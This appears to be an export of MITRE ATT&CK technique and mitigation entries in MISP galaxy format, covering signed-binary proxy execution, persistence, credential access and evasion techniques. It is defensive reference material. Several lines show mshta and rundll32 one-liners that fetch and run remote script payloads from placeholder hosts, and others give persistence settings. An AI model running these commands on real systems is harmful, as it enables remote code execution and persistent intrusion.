Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: `<code>[ComRegisterFunction]</code>` or `<code>[ComUnregisterFunction]</code>` respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: `misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1121"`

Regsvcs/Regasm - T1121 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009"` with estimative-language:likelihood-probability="almost-certain"

**Proxy - T1090**

Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPertMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing
trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.

The tag is: `misp-galaxy:mitre-attack-pattern="Proxy - T1090"

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**Rootkit - T1014**

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)

Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)

The tag is: `misp-galaxy:mitre-attack-pattern="Rootkit - T1014"

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<td><a href="https://en.wikipedia.org/wiki/Rootkit">https://en.wikipedia.org/wiki/Rootkit</a></td>
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</table>

**Mshta - T1170**

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension `<code>.hta</code>`. (Citation: Wikipedia HTML Application) HTAs are standalone
applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Files may be executed by mshta.exe through an inline script: `<code>mshta vbscript:Close(Execute("GetObject(""script:https[:\]//webserver/payload[.]sct"")))</code>`

They may also be executed directly from URLs: `<code>mshta http[:\]//webserver/payload[.]hta</code>`

Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: `misp-galaxy:mitre-attack-pattern="Mshta - T1170"

Mshta - T1170 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 3841. Table References

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**Screensaver - T1180**

Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in `<code>C:\Windows\System32</code>`, and `<code>C:\Windows\sysWOW64</code>` on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop</code>) and could be manipulated to achieve persistence:

- <code>SCRNSAVE.exe</code> - set to malicious PE path
- <code>ScreenSaveActive</code> - set to '1' to enable the screensaver
- <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock
- <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Screensaver - T1180"</code>

Screensaver - T1180 has relationships with:


Table 3842. Table References

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**Rundll32 - T1085**

The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.

Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:\\mshtmlRunHTMLApplication ";document.write();GetObject("script:https://www.[.]example[.]com/malicious.sct")"</code> This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)

The tag is: <code>misp-galaxy:mitre-attack-pattern="Rundll32 - T1085"</code>

Rundll32 - T1085 has relationships with:

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Hypervisor - T1062

This technique has been deprecated and should no longer be used.

A type-1 hypervisor is a software layer that sits between the guest operating systems and system’s hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.

The tag is: `misp-galaxy:mitre-attack-pattern="Hypervisor - T1062"`

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Kerberoasting - T1208

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service (Citation: Microsoft Detecting Kerberoasting Feb 2018)). (Citation: Microsoft SPN) (Citation: Microsoft SetSPN) (Citation: SANS Attacking Kerberos Nov 2014) (Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). (Citation: Empire InvokeKerberoast Oct 2016) (Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is
thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials. (Citation: AdSecurity Cracking Kerberos Dec 2015) (Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Cracked hashes may enable Persistence, Privilege Escalation, and Lateral Movement via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078). (Citation: SANS Attacking Kerberos Nov 2014)

The tag is: `misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208"

Kerberoasting - T1208 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"` with estimative-language:likelihood-probability="almost-certain"

**Table 3845. Table References**

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**Masquerading - T1036**

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036). (Citation: LOLBAS Main Site)

The tag is: `misp-galaxy:mitre-attack-pattern="Masquerading - T1036"

**Table 3846. Table References**
Scripting - T1064

This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.

Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.

Scripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.

Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)

The tag is: `misp-galaxy:mitre-attack-pattern="Scripting - T1064"`
Bootkit - T1067

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016)

Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

Master Boot Record

The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

Volume Boot Record

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1067"

Bootkit - T1067 has relationships with:

• revoked-by: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

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PowerShell - T1086

PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.

PowerShell may also be used to download and run executables from the Internet, which can be
executed from disk or in memory without touching disk.

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAAttack. (Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)

The tag is: `misp-galaxy:mitre-attack-pattern="PowerShell - T1086"`

PowerShell - T1086 has relationships with:


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### Timestomp - T1099

Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)

The tag is: `misp-galaxy:mitre-attack-pattern="Timestomp - T1099"`
Timestomp - T1099 has relationships with:


Table 3850. Table References

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Regsvr32 - T1117

Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)

Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.

Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1122). (Citation: Carbon Black Squiblydoo Apr 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117"

Regsvr32 - T1117 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

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</table>
InstallUtil - T1118

InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe</code>. InstallUtil.exe is digitally signed by Microsoft.

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: <code>misp-galaxy:mitre-attack-pattern="InstallUtil - T1118"</code>

InstallUtil - T1118 has relationships with:

- revoked-by: <code>misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004" with estimative-language:likelihood-probability="almost-certain"</code>

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CMSTP - T1191

The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: `misp-galaxy:mitre-attack-pattern="CMSTP - T1191"`

CMSTP - T1191 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003"` with estimative-language:likelihood-probability="almost-certain"

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**Keychain - T1142**

Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>, <code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user's logon credentials.

The tag is: `misp-galaxy:mitre-attack-pattern="Keychain - T1142"`

Keychain - T1142 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Keychain - T1555.001"` with estimative-language:likelihood-probability="almost-certain"
Launchctl - T1152

Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as `<code>launchctl submit -l <labelName> —/Path/to/thing/to/execute "arg" "arg" "arg"</code>`. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.

Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1152"

Launchctl - T1152 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Launchctl - T11569.001" with estimative-language:likelihood-probability="almost-certain"

Source - T1153

This technique has been deprecated and should no longer be used.

The `<code>source</code>` command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways `<code>source /path/to/filename [arguments]</code>` or `<code>./path/to/filename [arguments]</code>. This technique has been deprecated and should no longer be used. Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell’s environment.(Citation: Source Manual)

Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.
The tag is: **misp-galaxy:mitre-attack-pattern="Source - T1153"**

**Table 3856. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1153">https://attack.mitre.org/techniques/T1153</a></td>
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<td><a href="https://ss64.com/bash/source.html">https://ss64.com/bash/source.html</a></td>
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**Trap - T1154**

The `<code>trap</code>` command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like `<code>ctrl+c</code>` and `<code>ctrl+d</code>`. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format `<code>trap 'command list' signals</code>` where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: **misp-galaxy:mitre-attack-pattern="Trap - T1154"**

Trap - T1154 has relationships with:

- revoked-by: **misp-galaxy:mitre-attack-pattern="Trap - T1546.005" with estimative-language:likelihood-probability="almost-certain"**

**Table 3857. Table References**

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<td><a href="https://bash.cyberciti.biz/guide/Trap_statement">https://bash.cyberciti.biz/guide/Trap_statement</a></td>
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</table>

**HISTCONTROL - T1148**

The `<code>HISTCONTROL</code>` environment variable keeps track of what should be saved by the `<code>history</code>` command and eventually into the `<code>~/.bash_history</code>` file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". `<code>HISTCONTROL</code>` can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ls” will not be saved, but “ls” would be saved by history. `<code>HISTCONTROL</code>` does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.

The tag is: **misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148"**

HISTCONTROL - T1148 has relationships with:
Defacement - T1491

Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.

The tag is: `misp-galaxy:mitre-attack-pattern="Defacement - T1491"`

AppleScript - T1155

macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the `<code>osalang</code>` program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via `<code>osascript /path/to/script</code>` or `<code>osascript -e "script here"</code>`.

The tag is: `misp-galaxy:mitre-attack-pattern="AppleScript - T1155"`

AppleScript - T1155 has relationships with:

Geofencing - T1581

Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions. (Citation: Lookout eSrv)

[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements.

One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection. (Citation: Android Geofencing API)

Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground. (Citation: Apple Location Services)

[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411) and/or advertisements.

The tag is: `misp-galaxy:mitre-attack-pattern="Geofencing - T1581"`

*Table 3861. Table References*

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<td><a href="https://blog.lookout.com/esurv-research">https://blog.lookout.com/esurv-research</a></td>
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Emond - T1519

Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at `sbin/emond` will load any rules from the `etc/emond.d/rules/` directory and take action once an explicitly defined event takes place. The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path `private/var/db/emondClients`, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1160) configuration file at `System/Library/LaunchDaemons/com.apple.emond.plist`.

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.

The tag is: `misp-galaxy:mitre-attack-pattern="Emond - T1519"`

Emond - T1519 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Emond - T1546.014"` with estimative-language:likelihood-probability="almost-certain"

Table 3862. Table References

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Sudo - T1169

The sudoers file, `<code>/etc/sudoers</code>`, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible
permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like `<code>user1 ALL=(ALL) NOPASSWD: ALL</code>` (Citation: OSX.Dok Malware).

Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.

The tag is: `misp-galaxy:mitre-attack-pattern="Sudo - T1169"

Sudo - T1169 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Sudo and Sudo Caching - T1548.003"` with estimative-language:likelihood-probability="almost-certain"

Table 3863. Table References

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**Hooking - T1179**

Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions.

Hooking involves redirecting calls to these functions and can be implemented via:

- **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)

- **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

- **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process’s memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.

Malicious hooking mechanisms may also capture API calls that include parameters that reveal user
authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)

Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014) to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)

The tag is: `misp-galaxy:mitre-attack-pattern="Hooking - T1179"

Hooking - T1179 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"` with estimative-language:likelihood-probability="almost-certain"

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**DNSCalc - T1324**

This technique has been deprecated. Please use [DNS Calculation](https://attack.mitre.org/techniques/T1568/003).
DNS Calc is a technique in which the octets of an IP address are used to calculate the port for command and control servers from an initial DNS request. (Citation: CrowdstrikeNumberedPanda) (Citation: FireEyeDarwinsAPTGroup) (Citation: Rapid7G20Espionage)

The tag is: `misp-galaxy:mitre-attack-pattern="DNSCalc - T1324"`

Table 3865. Table References

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**Phishing - T1566**

Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source.

The tag is: `misp-galaxy:mitre-attack-pattern="Phishing - T1566"`

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**Keychain - T1579**

Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials.

On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain)
Course of Action

ATT&CK Mitigation.

Course of Action is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

MITRE

Registry Run Keys / Startup Folder Mitigation - T1060

Identify and block potentially malicious software that may be executed through run key or startup folder persistence using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Registry Run Keys / Startup Folder Mitigation - T1060"

Registry Run Keys / Startup Folder Mitigation - T1060 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

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Exfiltration Over Command and Control Channel Mitigation - T1041

Mitigations for command and control apply. Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Command and Control Channel Mitigation - T1041"

Exfiltration Over Command and Control Channel Mitigation - T1041 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

Table 3869. Table References

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https://attack.mitre.org/mitigations/T1041

Exfiltration Over Other Network Medium Mitigation - T1011

Ensure host-based sensors maintain visibility into usage of all network adapters and prevent the creation of new ones where possible. (Citation: Microsoft GPO Bluetooth FEB 2009) (Citation: TechRepublic Wireless GPO FEB 2009)

The tag is: misp-galaxy:mitre-course-of-action="Exfiltration Over Other Network Medium Mitigation - T1011"

Exfiltration Over Other Network Medium Mitigation - T1011 has relationships with:

• mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011" with estimative-language:likelihood-probability="almost-certain"

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https://attack.mitre.org/mitigations/T1011
Disable or Remove Feature or Program - M1042

Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Disable or Remove Feature or Program - M1042"

Disable or Remove Feature or Program - M1042 has relationships with:

- mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173" with estimative-language:likelihood-probability="almost-certain"
- mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"
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• mitigates: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

